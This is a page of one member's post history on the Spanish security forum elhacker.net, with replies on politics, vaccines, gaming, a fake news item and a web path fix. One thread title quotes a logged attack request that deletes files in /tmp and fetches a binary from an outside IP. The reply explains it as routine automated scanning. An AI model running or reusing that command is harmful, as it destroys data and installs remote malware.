elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 ... 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 [35] 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 ... 768
341  Foros Generales / Foro Libre / Re: quizas los Dioses no tengan lla apariencia que nosotros creemos..... en: 23 Diciembre 2020, 15:41 pm
si pero nadie hasta ahora despues de analizar las imagenes dice que es un fake...

Que no sea fake, no significa que sea dios. E insisto en mi pregunta...

¿Que apariencia crees que tiene dios? xD


Saludos
342  Foros Generales / Foro Libre / Re: El chat de altos mandos del Ejército retirados que llaman a fusilar a "26 millones de hijos de p**a" y dar un golpe en: 23 Diciembre 2020, 12:07 pm
Citar
@drvy: Pero no te parece injusto que se filtre una conversación privada y que tengas que dar explicaciones de lo que dices y piensas en la intimidad. No te recuerda a un regimen? Yo no veo delito, no están planeando una tentativa de homicidio contra nadie.

¿Injusto? ja..  Injusto seria que el gobierno hubiese intervenido las conversaciones y lo hubiese hecho público. Injusto seria que se pusiesen palabras en boca de otros. ¿Pero esto?

De injusto no tiene NADA. La privacidad y la cripto anarquía bienvenida sea y que nunca se acabe... pero cuando TU a SABIENDAS vas a COMUNICARTE CON UN GRUPO de personas en el que TU MISMO afirmas semejantes cosas y las haces VISIBLES al grupo y alguien del grupo decide publicarlo, el problema es tuyo... no es injusto.

Es más, es justo porque tú has compartido esa opinión tuya con esa persona y con ese grupo. Tú has dicho en un grupo privado (que no en la intimidad) que quieres matar gente y niños y a alguien de ese grupo no le ha parecido bien. A mí me importa una M donde se digan las cosas... Si se dicen es porque:

1. Se piensan o se han pensado.
2. Porque se defienden o se han definido
3. Ni lo piensas ni lo defiendes, pero vas de gracioso.

O lo piensas y lo defiendes o eres un idiota... y de injusto no tiene nada.


Ahora, ¿deben ser juzgados por lo que han dicho en una conversación privada? Pues no lo sé.... si hay planteamiento serio... si se debería... igual que se juzgaría a un grupo de terroristas que planifiquen un ataque por WhatsApp.... Si no hoy planteamiento y/o no se puede demostrar que no son más que simples palabras, pues que se les deje en paz, que con respirar para que ya tienen de sobra.

Citar
Todos vosotros habeís dicho barbaridades de estas en privado es que esto que hacen los medios ya es demagogia jajaj

Yo no digo en privado que haya que matar más de la mitad de un país solo porque no estoy de acuerdo con lo que han votado. Yo no voy por ahí hablando de matar niños... y eso de privado tiene poco cuando son más de 20 personas en un chat de grupo.


Se ve claramente, que esto no es ningún calentón. Hay gente que opina que se debería exterminar a más de la mitad de un país, solo porque no les gusta la democracia y lo que ha votado la mayoría. Esa es la ***** de jura de bandera y doble moral que tienen algunos de esos militares.

Saludos
343  Foros Generales / Foro Libre / Re: Mujer demanda a Samsung por 1.8 millones porque su teléfono se atascó en su vagina en: 22 Diciembre 2020, 18:20 pm
Noticia fake.

https://www.snopes.com/fact-check/samsung-cellphone-stuck/

Saludos
344  Programación / Desarrollo Web / Re: problema con mis rutas al subir proyecto a mi servidor vps en: 21 Diciembre 2020, 00:37 am
Ostras muy cierto jajajaja

Lo ideal en verdad seria definir una ruta global y no usar relativas de este tipo.

Código
  1.    const systemPath = '//dominio.com/cga/resources/views/system/';
  2.    ...
  3.    ...
  4.    ...
  5.  
  6.    $.ajax({
  7.        type:'post',
  8.        url: systemPath + 'post1.php',
  9.        ....
  10.  


Saludos
345  Programación / Desarrollo Web / Re: problema con mis rutas al subir proyecto a mi servidor vps en: 20 Diciembre 2020, 21:47 pm
Estas llamando a:
../resources/views/system/post1.php

desde:
/var/www/cga/public/js/script.js

Eso significa que vas a:
/var/www/cga/public/resources/views/system/post1.php

Pero tu quieres ir a:
/var/www/cga/resources/views/system/post1.php


Si te fijas, tienes que retroceder un directorio más.

Código
  1. url:'../../resources/views/system/post1.php',

Saludos
346  Seguridad Informática / Nivel Web / Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86 en: 19 Diciembre 2020, 17:22 pm
Esto es más que común. Son escaners automatizados que se dedican a probar vulnerabilidades conocidas. Pasa lo mismo por SSH... nada más levantes un servidor (asignarle IP) ya tienes intentos de login.

Saludos
347  Foros Generales / Foro Libre / Re: ¿Os pondreis la vacuna del Coronavirus cuando este disponible?. en: 18 Diciembre 2020, 15:36 pm
No es por nada, pero hay una nueva vacuna contra la gripe cada año, precisamente para pillar la variante más fuerte de turno .... y no veo a la gente volverse loca y no ponérsela porque fue desarrollada en menos de un año.

A mí el miedo a lo desconocido me parece muy justificable para no ponérsela (parece que hay algunos en este tema que ignoran como funciona una vacuna), pero para mí, pesan más los beneficios, entre ellos no contagiarse y lo más importante, no transmitir a otros más vulnerables. Porque yo el COVID si lo cojo igual ni me entero o lo pasó muy ligero, pero ¿Y mis familiares de mayor edad? ¿Y mis compañeros de trabajo y sus familiares?

En fin. Yo me la pondré en cuanto me sea indicado, no creo que sea de los primeros porque no estoy en un grupo de riesgo, pero en cuanto mi médico diga que ya me la puedo poner, iré y me la pondré.

Saludos
348  Foros Generales / Foro Libre / Re: quizas los Dioses no tengan lla apariencia que nosotros creemos..... en: 18 Diciembre 2020, 09:28 am
Citar
quizas los Dioses no tengan lla apariencia que nosotros creemos.....

¿Y qué apariencia creemos que tienen?
¿Y por qué ves algo raro y tu solución es llamarlo dios?

Saludos
349  Media / Juegos y Consolas / Re: ¿Por qué el odio a LOL? en: 16 Diciembre 2020, 16:42 pm
LoL... pues muy fácil, es el juego competitivo más jugado del mundo, el más streameado, el más visto, solo en este año ha generado 1,000,000,000 horas de previsualización en Twitch, es gratis y lo puedes correr hasta en una patata caliente.

Suma 1+1 y tienes 2 xD

Citar
mbién lo comento porque esa era la razón por la que nadie después lo quería ni lo aconsejaba al Counter-Strike.

No se, eso de que nadie lo aconsejase... serán los grupos estos de madres preocupadas por sus hijos o algo.. porque ... el CS ha estado en el top y ha dominado la escena competitiva en cuanto FPS desde que salió, estamos hablando ya de varias décadas. Ahora mismo ves las estadísticas y tienes 900 mil jugadores simultaneos xD



PD:  Yo de los "competitivos" que he jugado, el que se marece el mayor premio a la comunidad más ***** que hay, es Rust, porque la edad media del jugador ahí es muy baja.. pero oye..

Saludos
350  Foros Generales / Foro Libre / Re: ¿Os pondreis la vacuna del Coronavirus cuando este disponible?. en: 16 Diciembre 2020, 15:50 pm
Citar
o recuerdo la Talidomida era un farmaco "maravilloso" para los dolores de las embarazadas, casi no se probó y se administro a mansalva y las consecuencias, niños sin brazos y más deformaciones......


Yo creo que con ese "casí no se probó" le has dado en el clavo...

hizo que los responsables de Sanidad de muchos países empezaran a hacer un control estricto de los medicamentos antes de su comercialización. Por ejemplo, en Alemania, uno de los países más afectados por la talidomida (bajo el nombre de Contergan), antes de la catástrofe no existía ninguna ley ni comisión de control de medicamentos. En efecto, después de la catástrofe, muchos países paulatinamente empezaron a promulgar leyes de control de los medicamentos y también la exigencia que éstos sean sometidos a ensayos farmacológicos y probados en animales, además de ensayos clínicos en personas antes de su comercialización.


Literalmente antes de eso no había control. No creo que sea comparable a nada después de los años 60.

Saludos
Páginas: 1 ... 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 [35] 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 ... 768
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines